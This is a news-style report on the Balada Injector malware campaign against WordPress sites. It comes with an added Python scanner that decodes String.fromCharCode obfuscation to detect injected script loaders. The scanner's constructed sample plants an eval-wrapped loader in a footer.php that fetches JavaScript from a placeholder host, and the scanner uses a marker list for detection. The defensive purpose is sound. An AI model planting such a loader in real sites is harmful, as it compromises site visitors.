Massive Malware Campaign Infects Over One Million WordPress Sites Since 2017

Over one million WordPress websites are estimated to have been infected by Balada Injector, a malware campaign that has been active since 2017. The attackers exploit known and recently disclosed theme and plugin vulnerabilities to breach WordPress sites, carrying out the attacks in waves every few weeks. They are known for their preference for String.fromCharCode obfuscation and for hosting malicious scripts on random subdomains of freshly registered domain names. The malware creates fake WordPress admin users, harvests data stored on the underlying hosts, and leaves backdoors for persistent access. The attackers also search for tools such as adminer and phpMyAdmin that site administrators may have left behind, read or download arbitrary site files, and compromise other sites that share the same server account and file permissions.
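As an added defensive example (not code from the article, the campaign, or any WordPress security vendor), the script below shows how a site owner can triage the String.fromCharCode obfuscation the article mentions: it walks a wp-content tree, decodes every String.fromCharCode argument list it finds in PHP/JS/HTML files, and flags decoded payloads that look like injected script loaders. The sample files, the wp-content paths, and the example.invalid host are all constructed for illustration; the marker list is a heuristic to tune for your own code base.

```python
"""Scan WordPress theme/plugin files for String.fromCharCode-obfuscated injections.

Added defensive example; not the campaign's code and not a WordPress or vendor tool.
It decodes each String.fromCharCode(...) argument list found in a file and flags
decoded payloads that look like injected script loaders.
"""
import os
import re
from dataclasses import dataclass, field

# Matches String.fromCharCode( 104, 116, 0x74 ... ) with decimal or hex arguments,
# tolerating whitespace and line breaks between arguments.
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9xXa-fA-F\s,]+)\)")

# Substrings that, once decoded, indicate a script loader or redirect rather than
# ordinary text. Heuristic; tune for your own code base.
SUSPICIOUS_MARKERS = (
    "<script", "createelement", ".src", "eval(", "http://", "https://",
    "document.write", "location.", "appendchild",
)
LONG_PAYLOAD = 40  # decoded strings this long are rarely legitimate in templates


@dataclass
class Finding:
    path: str
    decoded: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def decode_charcodes(arglist: str) -> str:
    """Turn '104, 0x74, 116' into 'htt'. Non-numeric tokens raise ValueError."""
    out = []
    for tok in arglist.split(","):
        tok = tok.strip()
        if not tok:
            continue
        value = int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10)
        out.append(chr(value))
    return "".join(out)


def scan_text(path: str, text: str) -> list:
    """Return one Finding per decodable String.fromCharCode call in `text`."""
    findings = []
    for m in FROMCHARCODE.finditer(text):
        try:
            decoded = decode_charcodes(m.group(1))
        except ValueError:
            continue  # malformed argument list; not a decodable call
        low = decoded.lower()
        reasons = [k for k in SUSPICIOUS_MARKERS if k in low]
        if len(decoded) >= LONG_PAYLOAD:
            reasons.append("long-payload")
        findings.append(Finding(path, decoded, reasons))
    return findings


def scan_tree(root: str, exts=(".php", ".js", ".html")) -> list:
    """Walk a wp-content directory (assumed path) and scan every matching file."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(exts):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(full, fh.read()))
    return findings


def _encode(s: str) -> str:
    """Helper used only to build the constructed sample below."""
    return ",".join(str(ord(c)) for c in s)


# Constructed sample files (not real campaign artifacts). The injected loader
# points at a placeholder host, example.invalid.
INJECTED_LOADER = ('var s=document.createElement("script");'
                   's.src="https://example.invalid/x.js";'
                   'document.head.appendChild(s);')
SAMPLES = {
    "wp-content/themes/demo/js/app.js":
        "var greet = String.fromCharCode(72, 105); console.log(greet);",
    "wp-content/plugins/demo/footer.php":
        "<?php ?>\n<script>eval(String.fromCharCode("
        + _encode(INJECTED_LOADER) + "));</script>",
}


def scan_samples() -> list:
    """Scan the constructed samples; the benign one decodes to 'Hi' and is not flagged."""
    return [f for path, text in SAMPLES.items() for f in scan_text(path, text)]


if __name__ == "__main__":
    for f in scan_samples():
        flag = "SUSPICIOUS" if f.suspicious else "benign"
        print(f"{flag:10} {f.path}: {f.decoded[:60]!r} {f.reasons}")
```

Run it against a real install with `scan_tree("/path/to/wp-content")` and review every suspicious finding by hand; a decoded loader pointing at a domain you do not recognise is the cue to compare the file against a clean copy of the theme or plugin and to audit the admin user list for accounts you did not create.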

WordPress users are advised to keep their website software up to date, remove unused plugins and themes, and use strong WordPress admin passwords.

